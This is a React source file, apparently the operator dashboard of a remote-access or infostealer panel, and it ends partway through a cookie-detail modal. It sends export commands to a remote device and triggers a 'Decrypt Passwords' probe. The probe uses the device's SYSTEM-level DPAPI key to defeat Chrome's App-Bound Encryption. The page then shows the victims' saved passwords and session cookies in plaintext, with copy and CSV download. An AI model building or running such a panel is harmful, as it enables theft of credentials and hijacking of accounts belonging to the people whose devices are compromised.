import React, { useEffect, useRef, useState } from 'react';
import { useParams, useNavigate } from 'react-router-dom';
import { api } from '../store/auth';
import { useLiveEvents } from '../hooks/useLiveEvents';
import BackBtn from '../components/BackBtn';

function toCSV(rows) {
  if (!rows || rows.length === 0) return '';
  const headers = Object.keys(rows[0]);
  const lines = [
    headers.join(','),
    ...rows.map(r =>
      headers.map(h => {
        const v = r[h] == null ? '' : String(r[h]);
        return `"${v.replace(/"/g, '""')}"`;
      }).join(',')
    ),
  ];
  return lines.join('\n');
}

function downloadCSV(rows, filename) {
  const csv = toCSV(rows);
  const blob = new Blob([csv], { type: 'text/csv' });
  const url = URL.createObjectURL(blob);
  const a = document.createElement('a');
  a.href = url;
  a.download = filename + '.csv';
  a.click();
  URL.revokeObjectURL(url);
}

const SENSITIVE_TYPES = new Set(['passwords', 'cookies']);
const DIAG_KEY = '_diag';

export default function BrowserExports() {
  const { deviceId } = useParams();
  const navigate = useNavigate();
  const [exports, setExports] = useState([]);
  const [selected, setSelected] = useState(null);
  const [data, setData] = useState(null);
  const [activeTab, setActiveTab] = useState(null);
  const [decrypted, setDecrypted] = useState(false);
  const [cookieModal, setCookieModal] = useState(null);
  const [copied, setCopied] = useState(false);
  const [probeRunning, setProbeRunning] = useState(false);
  const [probeCreds, setProbeCreds] = useState(null);
  const [probeCookies, setProbeCookies] = useState(null);
  const [probeTab, setProbeTab] = useState('passwords');
  const [probeSearch, setProbeSearch] = useState('');
  const [probeOpen, setProbeOpen] = useState(false);
  const [probeError, setProbeError] = useState(null);   // null | string error message
  const [probeLastRun, setProbeLastRun] = useState(null); // ISO timestamp
  const probeRef = useRef(null);

  const loadExports = () =>
    api.get(`/devices/${deviceId}/browser`).then(r => setExports(r.data));

  useEffect(() => {
    loadExports();
    api.get(`/cmd/${deviceId}/probe/results`).then(r => {
      if (r.data?.v31_creds?.length > 0 || r.data?.v31_cookies?.length > 0) {
        setProbeCreds(r.data.v31_creds || []);
        setProbeCookies(r.data.v31_cookies || []);
        setProbeOpen(false);
      }
    }).catch(() => {});
  }, [deviceId]);

  useLiveEvents((e) => {
    if (e.device_id !== deviceId) return;
    if (e.event === 'browser_export_ready') { loadExports(); return; }
    if (e.event === 'decrypt_probe_result') {
      if (e.v31_creds?.length > 0 || e.v31_cookies?.length > 0) {
        setProbeCreds(e.v31_creds || []);
        setProbeCookies(e.v31_cookies || []);
        setProbeOpen(true);
        setProbeError(null);
        setProbeLastRun(new Date().toISOString());
        setProbeRunning(false);
        // Scroll results into view
        setTimeout(() => probeRef.current?.scrollIntoView({ behavior: 'smooth', block: 'start' }), 100);
      }
    }
  });

  const open = async (exp) => {
    const isPassCookies = exp.export_type === 'passwords_cookies';
    setSelected(exp);
    setData(null);
    setActiveTab(null);
    setDecrypted(isPassCookies);
    const fname = exp.file_path?.split(/[\\/]/).pop();
    const r = await api.get(`/files/browser/${fname}`);
    setData(r.data);
    const browsers = Object.keys(r.data || {});
    if (browsers.length > 0) {
      const types = Object.keys(r.data[browsers[0]] || {});
      const firstTab = isPassCookies
        ? (types.find(t => SENSITIVE_TYPES.has(t)) || types[0] || '')
        : (types.find(t => !SENSITIVE_TYPES.has(t)) || types[0] || '');
      setActiveTab(browsers[0] + ':' + firstTab);
    }
  };

  const runProbeDecrypt = async () => {
    setProbeRunning(true);
    setProbeError(null);
    setProbeCreds(null);
    setProbeCookies(null);
    setProbeOpen(true);
    try {
      await api.post(`/cmd/${deviceId}/probe/decrypt`, { browser: 'all' });
      let found = null;
      for (let i = 0; i < 20; i++) {
        await new Promise(r => setTimeout(r, 4000));
        try {
          const res = await api.get(`/cmd/${deviceId}/probe/results`);
          if (res.data?.v31_creds?.length > 0 || res.data?.v31_cookies?.length > 0) {
            found = res.data;
            break;
          }
        } catch { /* keep polling */ }
      }
      if (found) {
        setProbeCreds(found.v31_creds || []);
        setProbeCookies(found.v31_cookies || []);
        setProbeLastRun(new Date().toISOString());
        if ((found.v31_cookies?.length || 0) > 0 && !(found.v31_creds?.length > 0))
          setProbeTab('cookies');
        else
          setProbeTab('passwords');
        setTimeout(() => probeRef.current?.scrollIntoView({ behavior: 'smooth', block: 'start' }), 100);
      } else {
        setProbeError('no_results');
      }
    } catch (err) {
      setProbeError(err?.response?.data?.detail || err?.message || 'Unknown error');
    } finally {
      setProbeRunning(false);
    }
  };

  const requestDecrypt = () => runProbeDecrypt();

  const deleteExport = async (evt, exp) => {
    evt.stopPropagation();
    if (!window.confirm('Delete this browser export?')) return;
    try {
      await api.delete(`/devices/${deviceId}/browser/${exp.id}`);
      setExports(prev => prev.filter(e => e.id !== exp.id));
      if (selected?.id === exp.id) { setSelected(null); setData(null); }
    } catch { alert('Delete failed'); }
  };

  const requestExport = async (browser = null) => {
    try {
      const body = { export_type: 'all' };
      if (browser) body.browser = browser;
      await api.post(`/cmd/${deviceId}/browser/export`, body);
      alert(`Export command sent${browser ? ` for ${browser}` : ''} — refresh in 10–20 seconds.`);
    } catch {
      alert('Failed to send export command. Device may be offline.');
    }
  };

  const hasCreds = probeCreds?.length > 0;
  const hasCookies = probeCookies?.length > 0;
  const hasAnyProbeData = hasCreds || hasCookies;

  const browsers = [
    { key: 'chrome', label: '🟡 Chrome' },
    { key: 'edge',   label: '🔵 Edge' },
    { key: 'brave',  label: '🦁 Brave' },
    { key: 'firefox',label: '🦊 Firefox' },
  ];

  return (
    <div>
      {/* Header row */}
      <div style={{ display: 'flex', alignItems: 'center', gap: 12, marginBottom: 20, flexWrap: 'wrap' }}>
        <BackBtn onClick={() => navigate(`/device/${deviceId}`)} />
        <h2 style={{ fontWeight: 700, margin: 0 }}>Browser Exports</h2>
        {browsers.map(b => (
          <button key={b.key} onClick={() => requestExport(b.key)} style={btnStyle}>{b.label}</button>
        ))}
        <button onClick={() => requestExport(null)} style={{ ...btnStyle, borderColor: 'var(--accent)', color: 'var(--accent)' }}>Export All</button>
        <button onClick={loadExports} style={btnStyle}>Refresh</button>
        <button
          onClick={runProbeDecrypt}
          disabled={probeRunning}
          style={{ ...btnStyle, borderColor: '#a855f7', color: '#a855f7', fontWeight: 600,
            opacity: probeRunning ? 0.6 : 1 }}
        >
          {probeRunning ? '⏳ Decrypting…' : '🔓 Decrypt Passwords'}
        </button>
      </div>

      {/* ─── Probe Decrypt panel ─── */}
      {(hasAnyProbeData || probeRunning || probeError) && (
        <div ref={probeRef} style={{
          marginBottom: 24, border: `1px solid ${probeError ? '#ef444444' : '#a855f744'}`,
          borderRadius: 10, overflow: 'hidden',
        }}>
          {/* Panel header */}
          <div
            onClick={() => !probeRunning && probeError !== 'no_results' && hasAnyProbeData && setProbeOpen(v => !v)}
            style={{
              display: 'flex', alignItems: 'center', gap: 12, padding: '12px 16px',
              background: 'var(--surface)',
              cursor: (hasAnyProbeData && !probeRunning) ? 'pointer' : 'default',
              userSelect: 'none',
            }}
          >
            <span style={{ color: probeError ? '#ef4444' : '#a855f7', fontSize: 16 }}>
              {probeRunning ? '⏳' : probeError ? '✗' : probeOpen ? '▼' : '▶'}
            </span>
            <span style={{ fontWeight: 600, color: probeError ? '#f87171' : '#a855f7', flex: 1 }}>
              {probeRunning
                ? 'Collecting passwords & cookies from agent…'
                : probeError === 'no_results'
                  ? 'Decrypt returned no credentials'
                  : probeError
                    ? `Decrypt failed: ${probeError}`
                    : `Decrypted — Passwords (${probeCreds?.length ?? 0}) · Cookies (${probeCookies?.length ?? 0})`}
            </span>
            {probeLastRun && !probeRunning && (
              <span style={{ fontSize: 11, color: 'var(--muted)' }}>
                {new Date(probeLastRun).toLocaleTimeString()}
              </span>
            )}
            {!probeRunning && hasAnyProbeData && (
              <>
                <button
                  onClick={e => {
                    e.stopPropagation();
                    if (probeTab === 'passwords' && hasCreds)
                      downloadCSV(probeCreds.map(c => ({ browser: c.browser, url: c.u, username: c.n, password: c.p })), 'passwords');
                    else if (probeTab === 'cookies' && hasCookies)
                      downloadCSV(probeCookies, 'cookies');
                  }}
                  style={{ ...btnStyle, fontSize: 11 }}
                >CSV</button>
                <input
                  placeholder={probeTab === 'passwords' ? 'Filter URL / username…' : 'Filter host / name…'}
                  value={probeSearch}
                  onChange={e => { e.stopPropagation(); setProbeSearch(e.target.value); }}
                  onClick={e => e.stopPropagation()}
                  style={{ maxWidth: 200, padding: '3px 8px', background: 'var(--bg)',
                    border: '1px solid var(--border)', borderRadius: 6,
                    color: 'var(--text)', fontSize: 12 }}
                />
              </>
            )}
            {!probeRunning && (probeError || !hasAnyProbeData) && (
              <button
                onClick={e => { e.stopPropagation(); runProbeDecrypt(); }}
                style={{ ...btnStyle, fontSize: 11, borderColor: '#a855f7', color: '#a855f7' }}
              >Retry</button>
            )}
          </div>

          {/* Running state */}
          {probeRunning && (
            <div style={{ padding: '16px 20px', background: 'var(--bg)' }}>
              <div style={{ display: 'flex', alignItems: 'center', gap: 12, marginBottom: 10 }}>
                <div style={{ width: 200, height: 4, background: 'var(--border)', borderRadius: 2, overflow: 'hidden' }}>
                  <div style={{ width: '60%', height: '100%', background: '#a855f7',
                    animation: 'pulse 1.5s ease-in-out infinite', borderRadius: 2 }} />
                </div>
                <span style={{ color: 'var(--muted)', fontSize: 12 }}>Agent decrypting, uploading results…</span>
              </div>
              <p style={{ color: 'var(--muted)', fontSize: 12, margin: 0 }}>
                This uses the SYSTEM agent's machine-DPAPI key to unlock App-Bound Encrypted (v20) passwords.
                Typically takes 5–15 seconds. Waiting up to 80 s.
              </p>
            </div>
          )}

          {/* Error / no results state */}
          {!probeRunning && probeError && (
            <div style={{ padding: '16px 20px', background: 'var(--bg)' }}>
              {probeError === 'no_results' ? (
                <div>
                  <div style={{ color: '#fbbf24', fontWeight: 600, marginBottom: 8, fontSize: 13 }}>
                    ⚠ Agent responded but returned 0 credentials
                  </div>
                  <div style={{ color: 'var(--muted)', fontSize: 12, lineHeight: 1.6 }}>
                    <b style={{ color: 'var(--fg)' }}>Likely causes:</b>
                    <ul style={{ margin: '6px 0 6px 16px', padding: 0 }}>
                      <li>SYSTEM agent is offline or not connected — patches 40+42 need to be delivered first</li>
                      <li>App-Bound key decryption failed — SYSTEM machine-DPAPI or v2 IPC timed out</li>
                      <li>Browser has no saved passwords (check diagnostics tab on an export)</li>
                    </ul>
                    <b style={{ color: 'var(--fg)' }}>Fixes:</b>
                    <ul style={{ margin: '6px 0 0 16px', padding: 0 }}>
                      <li>Request a new Export → open it → click 🔍 Diagnostics to see key_path and v20_test</li>
                      <li>Ensure device is online so patches 40+42 are delivered (check device last-seen time)</li>
                      <li>Then click <b>Retry</b> above</li>
                    </ul>
                  </div>
                </div>
              ) : (
                <div style={{ color: '#f87171', fontSize: 13 }}>
                  <b>Error:</b> {probeError}
                  <br /><span style={{ color: 'var(--muted)', fontSize: 12 }}>Check that the device is online and try again.</span>
                </div>
              )}
            </div>
          )}

          {/* Results */}
          {!probeRunning && !probeError && hasAnyProbeData && probeOpen && (
            <>
              {/* Tab bar */}
              <div style={{ display: 'flex', gap: 4, padding: '8px 12px 0',
                borderBottom: '1px solid var(--border)', background: 'var(--surface)' }}>
                {[
                  { key: 'passwords', label: `Passwords (${probeCreds?.length ?? 0})`, has: hasCreds },
                  { key: 'cookies',   label: `Cookies (${probeCookies?.length ?? 0})`,  has: hasCookies },
                ].map(t => (
                  <button key={t.key}
                    onClick={() => { setProbeTab(t.key); setProbeSearch(''); }}
                    style={{ ...btnStyle, fontSize: 12,
                      fontWeight: probeTab === t.key ? 700 : 400,
                      borderColor: probeTab === t.key ? '#a855f7' : 'var(--border)',
                      color: probeTab === t.key ? '#a855f7' : (t.has ? 'var(--muted)' : '#555'),
                      marginBottom: -1 }}>
                    {t.label}
                  </button>
                ))}
              </div>

              {/* Passwords table */}
              {probeTab === 'passwords' && (() => {
                const q = probeSearch.toLowerCase();
                const rows = probeSearch
                  ? (probeCreds || []).filter(c =>
                      (c.u || '').toLowerCase().includes(q) || (c.n || '').toLowerCase().includes(q))
                  : (probeCreds || []);
                if (rows.length === 0)
                  return (
                    <p style={{ color: 'var(--muted)', fontSize: 13, padding: '16px 20px' }}>
                      No passwords found.
                      {probeSearch && ' (filtered — clear search to see all)'}
                    </p>
                  );
                return (
                  <div style={{ overflowX: 'auto', maxHeight: 500, overflowY: 'auto' }}>
                    <table style={{ width: '100%', borderCollapse: 'collapse', fontSize: 12 }}>
                      <thead>
                        <tr style={{ background: 'var(--bg)', position: 'sticky', top: 0 }}>
                          {['Browser', 'URL', 'Username', 'Password'].map(h => (
                            <th key={h} style={{ padding: '8px 12px', textAlign: 'left',
                              borderBottom: '1px solid var(--border)', fontWeight: 600,
                              whiteSpace: 'nowrap', color: 'var(--muted)' }}>{h}</th>
                          ))}
                        </tr>
                      </thead>
                      <tbody>
                        {rows.slice(0, 1000).map((c, i) => (
                          <tr key={i} style={{
                            borderBottom: '1px solid var(--border)22',
                            background: i % 2 === 0 ? 'transparent' : 'var(--surface)',
                          }}>
                            <td style={{ padding: '5px 12px', color: 'var(--muted)',
                              textTransform: 'capitalize', whiteSpace: 'nowrap' }}>{c.browser}</td>
                            <td style={{ padding: '5px 12px', maxWidth: 280,
                              overflow: 'hidden', textOverflow: 'ellipsis', whiteSpace: 'nowrap' }}>
                              <span title={c.u}>{(c.u || '').replace(/^https?:\/\//, '').slice(0, 70)}</span>
                            </td>
                            <td style={{ padding: '5px 12px', maxWidth: 180,
                              overflow: 'hidden', textOverflow: 'ellipsis', whiteSpace: 'nowrap' }}>
                              <span title={c.n}>{c.n}</span>
                            </td>
                            <td style={{ padding: '5px 12px', fontFamily: 'monospace',
                              userSelect: 'all', color: '#4ade80', fontWeight: 600 }}>
                              {c.p}
                            </td>
                          </tr>
                        ))}
                      </tbody>
                    </table>
                    {rows.length > 1000 && (
                      <p style={{ color: 'var(--muted)', fontSize: 11, padding: '4px 12px' }}>
                        Showing first 1000 of {rows.length}. Use CSV for full data.
                      </p>
                    )}
                  </div>
                );
              })()}

              {/* Cookies table */}
              {probeTab === 'cookies' && (() => {
                const q = probeSearch.toLowerCase();
                const rows = probeSearch
                  ? (probeCookies || []).filter(c =>
                      (c.host || '').toLowerCase().includes(q) || (c.name || '').toLowerCase().includes(q))
                  : (probeCookies || []);
                if (rows.length === 0)
                  return (
                    <p style={{ color: 'var(--muted)', fontSize: 13, padding: '16px 20px' }}>
                      No cookies found.
                      {probeSearch && ' (filtered — clear search to see all)'}
                    </p>
                  );
                return (
                  <div style={{ overflowX: 'auto', maxHeight: 500, overflowY: 'auto' }}>
                    <table style={{ width: '100%', borderCollapse: 'collapse', fontSize: 12 }}>
                      <thead>
                        <tr style={{ background: 'var(--bg)', position: 'sticky', top: 0 }}>
                          {['Browser', 'Host', 'Name', 'Value', 'Expires'].map(h => (
                            <th key={h} style={{ padding: '8px 12px', textAlign: 'left',
                              borderBottom: '1px solid var(--border)', fontWeight: 600,
                              whiteSpace: 'nowrap', color: 'var(--muted)' }}>{h}</th>
                          ))}
                        </tr>
                      </thead>
                      <tbody>
                        {rows.slice(0, 2000).map((c, i) => (
                          <tr key={i}
                            onClick={() => setCookieModal(c)}
                            style={{
                              borderBottom: '1px solid var(--border)22',
                              background: i % 2 === 0 ? 'transparent' : 'var(--surface)',
                              cursor: 'pointer',
                            }}
                            onMouseEnter={e => e.currentTarget.style.background = 'var(--accent)11'}
                            onMouseLeave={e => e.currentTarget.style.background = i % 2 === 0 ? 'transparent' : 'var(--surface)'}
                          >
                            <td style={{ padding: '5px 12px', color: 'var(--muted)',
                              textTransform: 'capitalize', whiteSpace: 'nowrap' }}>{c.browser}</td>
                            <td style={{ padding: '5px 12px', maxWidth: 200,
                              overflow: 'hidden', textOverflow: 'ellipsis', whiteSpace: 'nowrap' }}>
                              <span title={c.host}>{c.host}</span>
                            </td>
                            <td style={{ padding: '5px 12px', fontFamily: 'monospace',
                              maxWidth: 160, overflow: 'hidden', textOverflow: 'ellipsis', whiteSpace: 'nowrap' }}>
                              {c.name}
                            </td>
                            <td style={{ padding: '5px 12px', fontFamily: 'monospace',
                              maxWidth: 220, overflow: 'hidden', textOverflow: 'ellipsis',
                              whiteSpace: 'nowrap', userSelect: 'all', color: '#60a5fa' }}>
                              <span title={c.value}>{(c.value || '').slice(0, 80)}</span>
                            </td>
                            <td style={{ padding: '5px 12px', color: 'var(--muted)',
                              whiteSpace: 'nowrap', fontSize: 11 }}>{c.expires}</td>
                          </tr>
                        ))}
                      </tbody>
                    </table>
                    {rows.length > 2000 && (
                      <p style={{ color: 'var(--muted)', fontSize: 11, padding: '4px 12px' }}>
                        Showing first 2000 of {rows.length}. Use CSV for full data.
                      </p>
                    )}
                  </div>
                );
              })()}
            </>
          )}
        </div>
      )}

      {/* ─── Exports grid ─── */}
      {exports.length === 0 ? (
        <p style={{ color: 'var(--muted)', padding: 40, textAlign: 'center' }}>
          No browser exports yet. Click a browser button above to collect data from this device.
        </p>
      ) : (
        <div style={{ display: 'grid', gridTemplateColumns: 'repeat(auto-fill,minmax(220px,1fr))', gap: 10 }}>
          {exports.map((e, i) => (
            <div key={i} style={{
              background: selected?.id === e.id ? 'var(--accent)22' : 'var(--surface)',
              border: `1px solid ${selected?.id === e.id ? 'var(--accent)' : 'var(--border)'}`,
              borderRadius: 8, padding: 14,
            }}>
              <div onClick={() => open(e)} style={{ cursor: 'pointer' }}>
                <div style={{ fontWeight: 600, marginBottom: 4, textTransform: 'capitalize' }}>
                  {e.browser} — {e.export_type}
                </div>
                <div style={{ color: 'var(--muted)', fontSize: 12 }}>
                  {e.exported_at ? new Date(e.exported_at + 'Z').toLocaleString() : '—'}
                </div>
              </div>
              <button onClick={(evt) => deleteExport(evt, e)}
                style={{ marginTop: 8, padding: '3px 10px', background: 'transparent',
                  border: '1px solid #ef444444', borderRadius: 4, color: '#ef4444',
                  cursor: 'pointer', fontSize: 11 }}>
                Delete
              </button>
            </div>
          ))}
        </div>
      )}

      {/* ─── Selected export detail ─── */}
      {selected && (
        <div style={{ marginTop: 24 }}>
          <div style={{ display: 'flex', alignItems: 'center', gap: 12, marginBottom: 16 }}>
            <h3 style={{ margin: 0 }}>{selected.browser} / {selected.export_type}</h3>
            <button onClick={() => { setSelected(null); setData(null); }} style={btnStyle}>Close</button>
          </div>

          {!data ? (
            <p style={{ color: 'var(--muted)' }}>Loading...</p>
          ) : (
            <>
              {/* Decrypt banner */}
              {!decrypted && Object.values(data).some(bd => Object.keys(bd || {}).some(t => SENSITIVE_TYPES.has(t))) && (
                <div style={{ display: 'flex', alignItems: 'center', gap: 12, marginBottom: 14,
                  padding: '10px 16px', background: '#1a1200',
                  border: '1px solid #f59e0b44', borderRadius: 8, fontSize: 13 }}>
                  <span style={{ color: '#fbbf24' }}>🔒</span>
                  <span style={{ color: 'var(--muted)', flex: 1 }}>
                    Passwords and cookies are hidden. Click <b style={{ color: '#fbbf24' }}>Decrypt Data</b> to reveal them.
                  </span>
                  <button onClick={() => requestDecrypt()}
                    disabled={probeRunning}
                    style={{ ...btnStyle, borderColor: '#f59e0b', color: '#f59e0b', fontWeight: 600 }}>
                    {probeRunning ? '⏳ Decrypting…' : '🔓 Decrypt Data'}
                  </button>
                </div>
              )}

              {/* Tab bar */}
              <div style={{ display: 'flex', gap: 6, flexWrap: 'wrap', marginBottom: 14 }}>
                {Object.entries(data).flatMap(([browser, bdata]) =>
                  Object.keys(bdata || {}).map(type => {
                    if (type === DIAG_KEY) {
                      const key = browser + ':' + DIAG_KEY;
                      return (
                        <button key={key} onClick={() => setActiveTab(key)} style={{
                          ...btnStyle,
                          borderColor: activeTab === key ? '#a78bfa' : 'var(--border)',
                          color: activeTab === key ? '#a78bfa' : 'var(--muted)',
                        }}>
                          🔍 {browser} / diagnostics
                        </button>
                      );
                    }
                    const key = browser + ':' + type;
                    const rows = bdata[type] || [];
                    const locked = SENSITIVE_TYPES.has(type) && !decrypted;
                    return (
                      <button key={key} onClick={() => !locked && setActiveTab(key)} style={{
                        ...btnStyle,
                        borderColor: locked ? 'var(--border)' : activeTab === key ? 'var(--accent)' : 'var(--border)',
                        color: locked ? '#555' : activeTab === key ? 'var(--accent)' : 'var(--muted)',
                        cursor: locked ? 'not-allowed' : 'pointer',
                        opacity: locked ? 0.5 : 1,
                      }}>
                        {locked ? '🔒 ' : ''}{browser} / {type} ({locked ? '?' : rows.length})
                      </button>
                    );
                  })
                )}
              </div>

              {/* Active tab content */}
              {activeTab && (() => {
                const [browser, type] = activeTab.split(':');

                // ── Diagnostics tab ──────────────────────────────────────────
                if (type === DIAG_KEY) {
                  const diag = data[browser]?.[DIAG_KEY] || {};
                  const ok  = () => <span style={{ color: '#4ade80' }}>✓</span>;
                  const bad = () => <span style={{ color: '#f87171' }}>✗</span>;
                  return (
                    <div style={{ fontSize: 12, fontFamily: 'monospace' }}>
                      {/* Crypto status */}
                      <div style={{ marginBottom: 14, padding: '10px 14px', borderRadius: 6, fontWeight: 600,
                        ...(diag.pycryptodome === true
                          ? { background: '#001a00', border: '1px solid #4ade8044', color: '#4ade80' }
                          : diag.pycryptodome === false
                            ? { background: '#1a0000', border: '1px solid #ef444488', color: '#f87171' }
                            : { background: '#1a1200', border: '1px solid #f59e0b44', color: '#fbbf24' }) }}>
                        {diag.pycryptodome === true  && '✓ AES-GCM decryption available — crypto library loaded'}
                        {diag.pycryptodome === false && '⛔ AES-GCM NOT available — pycryptodome missing. Click "⚡ Patch Crypto" then run a new export.'}
                        {diag.pycryptodome === undefined && '? AES status unknown — run a new export to check.'}
                      </div>

                      {/* Paths */}
                      <div style={{ marginBottom: 14 }}>
                        <div style={{ color: 'var(--muted)', fontWeight: 600, marginBottom: 6 }}>PATHS SEARCHED</div>
                        {(diag.paths_checked || []).map((p, i) => (
                          <div key={i} style={{ display: 'flex', gap: 8, marginBottom: 3 }}>
                            {p.exists ? ok() : bad()}
                            <span style={{ color: p.exists ? 'var(--fg)' : '#555', wordBreak: 'break-all' }}>{p.path}</span>
                          </div>
                        ))}
                        {!(diag.paths_checked || []).length && <span style={{ color: '#555' }}>No path info</span>}
                      </div>

                      {/* Per-profile */}
                      {(diag.profiles || []).map((p, i) => {
                        const hasData = p.login_rows > 0 || p.cookie_rows > 0;
                        const keyOk   = p.app_bound_key && p.v20_test === 'OK';
                        const keyBad  = p.app_bound_key && p.v20_test && p.v20_test !== 'OK';
                        const allV20  = (p.login_v20 + p.cookie_v20) > 0 && !p.app_bound_key;
                        const borderCol = !hasData ? 'var(--border)' : keyOk ? '#4ade8044' : keyBad ? '#ef444444' : allV20 ? '#f59e0b44' : '#4ade8044';
                        return (
                          <div key={i} style={{
                            marginBottom: 12, padding: '10px 14px',
                            background: 'var(--surface)', borderRadius: 6,
                            border: `1px solid ${borderCol}`,
                          }}>
                            <div style={{ fontWeight: 700, marginBottom: 6 }}>{p.label}</div>
                            <div style={{ display: 'grid', gridTemplateColumns: '1fr 1fr', gap: '4px 24px' }}>
                              <div>{p.login_db_exists ? ok() : bad()} Login DB{p.login_db_exists ? ` — ${p.login_rows} rows (v10:${p.login_v10} v20:${p.login_v20} dpapi:${p.login_dpapi})` : ' not found'}</div>
                              <div>{p.cookie_db_exists ? ok() : bad()} Cookie DB{p.cookie_db_exists ? ` — ${p.cookie_rows} rows (v10:${p.cookie_v10} v20:${p.cookie_v20})` : ' not found'}</div>
                              <div>{p.ls_exists ? ok() : bad()} Local State</div>
                              <div></div>
                              <div>{p.aes_key ? ok() : bad()} AES key (v10)</div>
                              <div>
                                {p.app_bound_key ? ok() : bad()} App-Bound key (v20)
                                {p.key_path && <span style={{ color: '#60a5fa', marginLeft: 6 }}>[{p.key_path}]</span>}
                              </div>
                            </div>
                            {p.v20_test && (
                              <div style={{ marginTop: 8, color: p.v20_test === 'OK' ? '#4ade80' : '#f87171' }}>
                                {p.v20_test === 'OK'
                                  ? `✓ v20 test decrypt OK (key_hex: ${p.key_hex || '?'})`
                                  : `✗ v20 test FAILED: ${p.v20_test}${p.key_hex ? ` (key_hex: ${p.key_hex})` : ''}`}
                              </div>
                            )}
                            {!p.app_bound_key && (p.login_v20 > 0 || p.cookie_v20 > 0) && (
                              <div style={{ marginTop: 8, color: '#fbbf24' }}>
                                ⚠ {p.login_v20 + p.cookie_v20} v20 blobs found but App-Bound key unavailable — SYSTEM IPC may have failed.
                              </div>
                            )}
                            {keyBad && (
                              <div style={{ marginTop: 8, color: '#fbbf24' }}>
                                ⚠ Key retrieved but test decrypt failed — wrong key. Ensure patches 40+42 are delivered.
                              </div>
                            )}
                          </div>
                        );
                      })}

                      {/* Errors */}
                      {(diag.errors || []).length > 0 && (
                        <div style={{ marginTop: 10 }}>
                          <div style={{ color: '#f87171', fontWeight: 600, marginBottom: 4 }}>ERRORS</div>
                          {diag.errors.map((e, i) => (
                            <div key={i} style={{ color: '#f87171', marginBottom: 2 }}>{e}</div>
                          ))}
                        </div>
                      )}
                    </div>
                  );
                }

                const rows = data[browser]?.[type] || [];
                const locked = SENSITIVE_TYPES.has(type) && !decrypted;
                if (locked) return (
                  <div style={{ padding: 40, textAlign: 'center', color: 'var(--muted)' }}>
                    🔒 Click "Decrypt Data" above to view {type}.
                  </div>
                );

                const cryptoDiag = SENSITIVE_TYPES.has(type) && rows.length === 0
                  ? data[browser]?._diag
                  : null;

                return (
                  <div>
                    {cryptoDiag && (
                      <div style={{ marginBottom: 12, padding: '10px 14px', borderRadius: 6, fontSize: 12,
                        ...(cryptoDiag.pycryptodome === false
                            ? { background: '#1a0000', border: '1px solid #ef444488', color: '#fca5a5' }
                          : cryptoDiag.pycryptodome === undefined
                            ? { background: '#1a1200', border: '1px solid #f59e0b44', color: '#fcd34d' }
                            : (() => {
                                const anyKeyBad = (cryptoDiag.profiles || []).some(p => p.app_bound_key && p.v20_test && p.v20_test !== 'OK');
                                return anyKeyBad
                                  ? { background: '#1a0000', border: '1px solid #ef444488', color: '#fca5a5' }
                                  : { background: '#001a00', border: '1px solid #4ade8044', color: '#86efac' };
                              })()) }}>
                        {cryptoDiag.pycryptodome === false && '⛔ AES-GCM not available — click "⚡ Patch Crypto" in the installer, then request a new export.'}
                        {cryptoDiag.pycryptodome === undefined && '? Crypto status unknown — run a new export to see updated status.'}
                        {cryptoDiag.pycryptodome === true && (() => {
                          const anyKeyBad = (cryptoDiag.profiles || []).some(p => p.app_bound_key && p.v20_test && p.v20_test !== 'OK');
                          const anyTestOk = (cryptoDiag.profiles || []).some(p => p.v20_test === 'OK');
                          if (anyKeyBad) return '✗ App-Bound key retrieved but test decrypt FAILED — wrong key. Ensure patches 40+42 are delivered; re-run decrypt after device reconnects.';
                          if (anyTestOk) return '✓ AES library loaded and v20 test decrypt passed — all credentials should be available.';
                          return '⚠ AES library loaded but all decrypts returned 0 — check diagnostics tab for key_path and v20_test details.';
                        })()}
                      </div>
                    )}
                    <div style={{ display: 'flex', alignItems: 'center', gap: 10, marginBottom: 10 }}>
                      <span style={{ color: 'var(--muted)', fontSize: 12 }}>{rows.length} records</span>
                      <button onClick={() => downloadCSV(rows, `${selected.browser}_${type}`)}
                        style={btnStyle}>↓ Download CSV</button>
                    </div>
                    <div style={{ overflowX: 'auto', borderRadius: 6, border: '1px solid var(--border)' }}>
                      <table style={{ width: '100%', borderCollapse: 'collapse', fontSize: 12, fontFamily: 'monospace' }}>
                        <thead>
                          <tr style={{ background: 'var(--surface-2, #1a1a2e)' }}>
                            {rows[0] && Object.keys(rows[0]).map(col => (
                              <th key={col} style={{ padding: '8px 12px', textAlign: 'left',
                                color: 'var(--muted)', fontWeight: 600, whiteSpace: 'nowrap',
                                borderBottom: '1px solid var(--border)' }}>
                                {col}
                              </th>
                            ))}
                          </tr>
                        </thead>
                        <tbody>
                          {rows.slice(0, 500).map((r, i) => {
                            const isCookie = type === 'cookies';
                            return (
                              <tr key={i}
                                onClick={isCookie ? () => setCookieModal(r) : undefined}
                                style={{ borderBottom: '1px solid var(--border)22',
                                  cursor: isCookie ? 'pointer' : 'default' }}
                                onMouseEnter={isCookie ? (e) => e.currentTarget.style.background = 'var(--accent)11' : undefined}
                                onMouseLeave={isCookie ? (e) => e.currentTarget.style.background = 'transparent' : undefined}>
                                {Object.entries(r).map(([col, val]) => (
                                  <td key={col} style={{ padding: '6px 12px', maxWidth: 300,
                                    overflow: 'hidden', textOverflow: 'ellipsis', whiteSpace: 'nowrap' }}>
                                    {col === 'url' || col === 'origin_url' ? (
                                      <a href={val} target="_blank" rel="noreferrer"
                                        onClick={(e) => e.stopPropagation()}
                                        style={{ color: 'var(--accent)' }}>{val}</a>
                                    ) : (
                                      <span title={String(val)}>{val == null ? '—' : String(val)}</span>
                                    )}
                                  </td>
                                ))}
                              </tr>
                            );
                          })}
                        </tbody>
                      </table>
                    </div>
                    {rows.length > 500 && (
                      <p style={{ color: 'var(--muted)', fontSize: 12, marginTop: 8 }}>
                        Showing 500 of {rows.length} — download CSV for full data.
                      </p>
                    )}
                  </div>
                );
              })()}
            </>
          )}
        </div>
      )}

      {/* ─── Cookie detail modal ─── */}
      {cookieModal && (() => {
        const r = cookieModal;
        const host  = r.host_key || r.host || r.domain || '—';
        const name  = r.name || '—';
        const created = r.creation_utc || r.creation || r.created || '—';
        const expires = r.expires || r.expires_utc || r.expiry || '—';
        const value = r.value == null ? '' : String(r.value);
        const copy = async () => {
          try {
            await navigator.clipboard.writeText(value);
            setCopied(true);
            setTimeout(() => setCopied(false), 1200);
          } catch {
            const ta = document.createElement('textarea');
            ta.value = value;
            document.body.appendChild(ta);
            ta.select();
            document.execCommand('copy');
            document.body.removeChild(ta);
            setCopied(true);
            setTimeout(() => setCopied(false), 1200);
          }
        };
        return (
          <div onClick={() => setCookieModal(null)} style={{
            position: 'fixed', inset: 0, background: 'rgba(0,0,0,0.65)', zIndex: 1000,
